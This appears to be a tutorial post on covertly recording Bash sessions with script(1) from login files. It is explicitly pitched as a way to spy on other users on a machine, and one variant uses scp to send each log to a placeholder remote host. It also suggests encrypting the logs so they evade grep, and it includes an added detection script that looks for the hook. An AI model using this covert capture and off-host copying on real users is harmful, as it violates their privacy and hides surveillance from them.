Logging your BASH sessions can be useful to keep a log of what you have done on your computer or spy on other users. This is a basic example of how to use the script program and a login script to automatically create a separate log file for each terminal session.
Code
The code can be put into one of several different files: ~/.bash_profile for per-user logging, or /etc/profile or /etc/bash/bashrc to log all users on the box. A destination directory also needs to be created, writable by the user being logged.
# Only run if this is the first shell.
# script will launch another instance of BASH.
# BASH automatically increments this environment variable each time it is run within itself.
# This will prevent it from running in an infinite loop.
if [ "$SHLVL" -eq 1 ];
then
    # Run the script command and drop down to the user's shell.
    # SHLVL will be incremented and will equal 2.
    # -q(quiet) - Don't print anything to the screen.
    # -f(flush) - Flush output to the log after each write (util-linux script). The log file itself is the last argument.
    # /tmp/ - The directory to save the logs. Needs write permission by the user being logged.
    # ${USER} - Puts the username in the log file name. Braces are used so the underscore isn't interpreted as being part of the variable name.
    # .log - A file extension. Doesn't really mean anything.
    # `date +%Y%m%d_%H%M%S` - Run the date command and return YYYYMMDD_HHMMSS
    script -q -f "/tmp/${USER}_`date +%Y%m%d_%H%M%S`.log"
    # This will exit the first BASH session, preventing the user from having to type exit twice.
    exit
# End the if statement.
fi
Impact
- The user will notice an extra BASH session and the script program running if they were to list their processes.
Alternative Code
This can be used if the SHLVL variable isn’t set by BASH.
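# Was: if [ $SHLVL -eq 1 ];
# Only run if the marker variable is not set yet.
if [ -z "$SCRIPT" ];
then
    # Was: script -q -f /tmp/${USER}_`date +%Y%m%d_%H%M%S`.log
    # SCRIPT=yes is passed to the nested shell so the check above fails there.
    SCRIPT=yes script -q -f "/tmp/${USER}_`date +%Y%m%d_%H%M%S`.log"
    exit
# End the if statement.
fi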
Impact
- Same as the previous code along with an extra variable in their environment. The env command will reveal it.
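The indicators from the two Impact lists above (a script process in the shell's parent chain, the SCRIPT variable, and the hook line in a login file) can be checked from the logged user's side. This is an added example, not code from the original post; it assumes Linux /proc, and PROC_ROOT and the function names are made up for illustration.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: check for the indicators the
# Impact sections list. PROC_ROOT is an assumed override used for testing.
PROC_ROOT=${PROC_ROOT:-/proc}

# Print file:line:text for each non-comment line in the given startup files
# that runs script(1), with or without a VAR=value prefix (SCRIPT=yes ...).
find_script_hooks() {
    local f
    local re='^[[:space:]]*([A-Za-z_][A-Za-z0-9_]*=[^[:space:]]*[[:space:]]+)*(exec[[:space:]]+)?script([[:space:]]|$)'
    for f in "$@"; do
        [ -r "$f" ] || continue
        grep -HnE "$re" "$f" || true
    done
}

# Walk the parent chain of a PID through $PROC_ROOT/<pid>/status and print the
# PID of the first process named "script"; return 1 if the chain has none.
script_ancestor() {
    local pid="$1" name
    while [ "$pid" -gt 1 ] 2>/dev/null && [ -r "$PROC_ROOT/$pid/status" ]; do
        name=$(awk '$1 == "Name:" { print $2 }' "$PROC_ROOT/$pid/status")
        if [ "$name" = "script" ]; then
            echo "$pid"
            return 0
        fi
        pid=$(awk '$1 == "PPid:" { print $2 }' "$PROC_ROOT/$pid/status")
    done
    return 1
}

# Report on the current shell and the login files named in the post.
audit_session() {
    local hit
    if hit=$(script_ancestor "$$"); then
        echo "this shell runs under script(1), pid $hit"
    fi
    [ -z "${SCRIPT:-}" ] || echo "SCRIPT marker variable is set: $SCRIPT"
    find_script_hooks /etc/profile /etc/bash/bashrc "$HOME/.bash_profile"
}

audit_session
```

No output means none of the three indicators was found for the current shell.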
Another Idea
This could be taken one step further to do other things with the log file. The name of the file could be stored in a variable before the script command is run, to preserve the name, and then used to Secure Copy the file to a remote box. This assumes the keys are set up for SSH in the user's ~/.ssh/ directory so a password is not required to log into the remote box.
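if [ "$SHLVL" -eq 1 ];
then
    # Store the log file name so it can be reused after the session ends.
    FILE="/tmp/${USER}_`date +%Y%m%d_%H%M%S`.log"
    script -q -f "$FILE"
    # Copy the finished log to the remote box once the logged shell exits.
    scp "$FILE" remoteuser@remotehost:/path/to/logs/
    exit
fi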
Impact
- This will include the same impacts as the original code as well as an outgoing connection to a remote box.
- The addition of the remote host’s public key in the /etc/ssh/ssh_known_hosts file or the user's ~/.ssh/known_hosts file.
- The addition of the remote user’s public key in the user's ~/.ssh/authorized_keys file.
Conclusion
The possibilities are endless. The log file could be compressed or even encrypted somehow. This would help prevent simple utilities, such as grep, from finding content in the files.